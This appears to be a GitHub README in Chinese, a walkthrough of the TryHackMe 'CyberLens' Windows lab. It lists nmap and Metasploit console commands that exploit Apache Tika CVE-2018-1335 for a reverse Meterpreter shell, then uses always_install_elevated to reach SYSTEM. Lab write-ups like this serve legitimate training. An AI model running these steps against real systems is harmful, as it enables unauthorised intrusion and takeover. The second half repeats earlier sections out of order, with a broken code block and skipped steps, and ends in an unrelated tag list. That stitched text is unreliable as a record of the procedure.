Kush7007647/Cyber-Lens
GitHub: Kush7007647/Cyber-Lens
一篇 TryHackMe CyberLens Windows 靶机的渗透测试通关笔记,演示了利用 Apache Tika 漏洞获取初始访问及 Windows 提权的完整流程。
Stars: 0 | Forks: 0
# Cyber-Lens - Try Hack Me
CyberLens 是 TryHackMe 上一台 Easy 级别的 Windows CTF 机器,旨在帮助学习者练习真实的渗透测试技术。目标是利用存在漏洞的 Web 服务器,获取目标系统的初始访问权限,提升特权,并捕获隐藏的 flag。
# 概述
CyberLens 是一台基于 Windows 的 TryHackMe 机器,侧重于 Web 应用枚举、漏洞识别、漏洞利用和权限评估。在这次测试中,在一个非标准端口上发现了暴露的 Apache Tika 服务。该服务存在 Apache Tika Header Command Injection 漏洞,允许执行远程代码并获取目标系统的初始访问权限。
# 实验信息
字段 值
平台 TryHackMe
机器名称 CyberLens
难度 Easy
操作系统 Windows
目标 捕获 User Flag & Root Flag
信息收集
• 枚举:使用 nmap 扫描端口。像往常一样,第一步是识别与目标系统的连接点:开放端口。通常,我们可以使用 NMAP 或 Nikto 来完成此操作,而 Metasploit 也同样内置了此功能。
首先,我们需要定义远程主机(RHOSTS)。这将用于为 NMAP 模块识别目标 IP:
```
CMD : nmap -sV
```
这些端口是开放的。
• 枚举所有 PORT:查看 61777 端口服务……这基本上表明我们忽略了一个重要的端口:61777。这是因为该端口的编号很高。让我们也使用 -p 标志对其进行扫描。
```
CMD : nmap -p61777 -sV
```
正在运行此服务
• 在浏览器上查看此端口:
• 检查此服务版本的 Exploit 是否可用:在浏览器上搜索,我们发现了带有 CVE-2018–1335(远程代码执行)漏洞的 Apache Tika 1.17 服务器。
漏洞 = Header Command Injection [+]
在 Rapid7 上可用,这意味着 Metasploit 中存在可用的 Exploit
然而,如果我们查看该 Exploit 的选项,必须调整几个参数:
RPORT:我们使用的是自定义端口 61777
LHOST:监听器的 IP。通常,它必须是我们的 IP。
我使用 set 命令配置了相应的设置。
按回车键或点击以查看全尺寸图像
• 打开 Meta-sploit:
```
CMD : msfconsole
Search tika
```
```
Use 0
Show options
Set rhosts
Set rport 61777
Set lhost tun0
Exploit
[+]
[+]
Meterpreter>
Getuid
```
检查桌面文件夹,你将获得 USER.TXT
• 将此会话置于后台 = CTRL + Z
USER.TXT--------------------------------------------------------FLAG{}--------------------------------------------------------------
# 权限提升
当然,这对我们来说还不够,我们需要 root(管理员)flag。让我们使用 background 命令将其置于后台,继续控制这台机器:
……并寻找类似 Windows Privilege Escalation Awesome Scripts (WinPEAS) 的工具。但是同样,无需下载任何内容,因为这类脚本也默认作为 Exploit Suggester 提供。
• 开始权限提升:使用 POST 模块
• POST 模块:post/multi/recon/local_exploit_suggester
```
CMD : use post/multi/recon/local_exploit_suggester
Show options
Set session 1
Exploit
[+]
[+]
```
用于提升权限的 EXPLOIT 列表。
```
Use exploit/windows/local/always_install_elevated
Show options
Set session 1
Set lhost tun0
Set lport 4445
Exploit
[+]
[+]
Meterpreter>
Getuid
```
已获取访问权限 = Local System User
ROOT.TXT---------------------------------------------------------------FLAG{}---------------------------------------------------------
恭喜你,我想你已经成功 root 了这台机器!
拜拜!
这些端口是开放的。
• 枚举所有 PORT:查看 61777 端口服务……这基本上表明我们忽略了一个重要的端口:61777。这是因为该端口的编号很高。让我们也使用 -p 标志对其进行扫描。
```
CMD : nmap -p61777 -sV
正在运行此服务
• 在浏览器上查看此端口:
• 检查此服务版本的 Exploit 是否可用:在浏览器上搜索,我们发现了带有 CVE-2018–1335(远程代码执行)漏洞的 Apache Tika 1.17 服务器。
漏洞 = Header Command Injection [+]
在 Rapid7 上可用,这意味着 Metasploit 中存在可用的 Exploit
然而,如果我们查看该 Exploit 的选项,必须调整几个参数:
RPORT:我们使用的是自定义端口 61777
LHOST:监听器的 IP。通常,它必须是我们的 IP。
我使用 set 命令配置了相应的设置。
按回车键或点击以查看全尺寸图像
• 打开 Meta-sploit:
```
CMD : msfconsole
Search tika
```
```
Use 0
Show options
Set rhosts
用于提升权限的 EXPLOIT 列表。
```
Use exploit/windows/local/always_install_elevated
Show options
Set session 1
Set lhost tun0
Set lport 4445
Exploit
[+]
[+]
Meterpreter>
Getuid
```
已获取访问权限 = Local System User
ROOT.TXT---------------------------------------------------------------FLAG{}---------------------------------------------------------
恭喜你,我想你已经成功 root 了这台机器!
拜拜!标签:CISA项目, CTI, OPA, Web报告查看器, 协议分析, 权限提升, 漏洞复现, 网络安全, 隐私保护, 靶场